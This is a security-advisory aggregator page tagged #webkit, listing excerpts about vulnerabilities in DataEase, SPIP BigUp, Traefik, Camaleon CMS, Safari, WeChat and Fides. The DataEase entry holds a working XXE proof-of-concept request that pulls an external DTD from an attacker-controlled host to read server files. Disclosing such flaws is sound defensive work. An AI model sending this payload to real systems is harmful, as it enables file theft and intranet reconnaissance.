Security
Headlines
HeadlinesLatestCVEs

Tag

#webkit

GHSA-4m9p-7xg6-f4mm: DataEase has an XML External Entity Reference vulnerability

### Impact There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. 1. send request: ``` POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///...

ghsa
Open in Source
#vulnerability#web#windows#apple#ubuntu#js#git#auth#chrome#webkit
SPIP BigUp 4.3.1 Code Injection

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

SPIP BigUp 4.2.15 Code Injection

SPIP BigUp version 4.2.15 suffers from a remote PHP code injection vulnerability.

GHSA-62c8-mh53-4cqv: HTTP client can manipulate custom HTTP headers that are added by Traefik

### Impact There is a vulnerability in Traefik that allows the client to remove the X-Forwarded headers (except the header X-Forwarded-For). ### Patches - https://github.com/traefik/traefik/releases/tag/v2.11.9 - https://github.com/traefik/traefik/releases/tag/v3.1.3 ### Workarounds No workaround. ### For more information If you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues). <details> <summary>Original Description</summary> ### Summary When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in ...

GHSA-wmjg-vqhv-q5p5: Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182)

An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application. Once a user upload is started via the [upload](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L86-L87) method, the file_upload and the folder parameter ```ruby def upload(settings = {}) params[:dimension] = nil if params[:skip_auto_crop].present? f = { error: 'File not found.' } if params[:file_upload].present? f = upload_file(params[:file_upload], { folder: params[:folder], dimension: params['dimension'], formats: params[:fo...

Apple Security Advisory 09-16-2024-6

Apple Security Advisory 09-16-2024-6 - Safari 18 addresses cross site scripting and spoofing vulnerabilities.

Vulnerability in Tencent WeChat custom browser could lead to remote code execution

While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.

GHSA-c34r-238x-f7qx: Remote Code Execution Vulnerability via SSTI in Fides Webserver Jinja Email Templating Engine

### Summary The Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default `Owner` or `Contributor` role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed. ### Details The application enables the creation of message templates that are sent via email to Fides Privacy Center users (data subjects) who raise privacy requests such as data subject access requests or consent management requests via the Privacy Center. These emails are triggered at various points in the request processing flow, for example when a request is denied or approved. The messages are defined using Jinja2 templates, allowing the use of statement and expression directives to craft more complex messages that includ...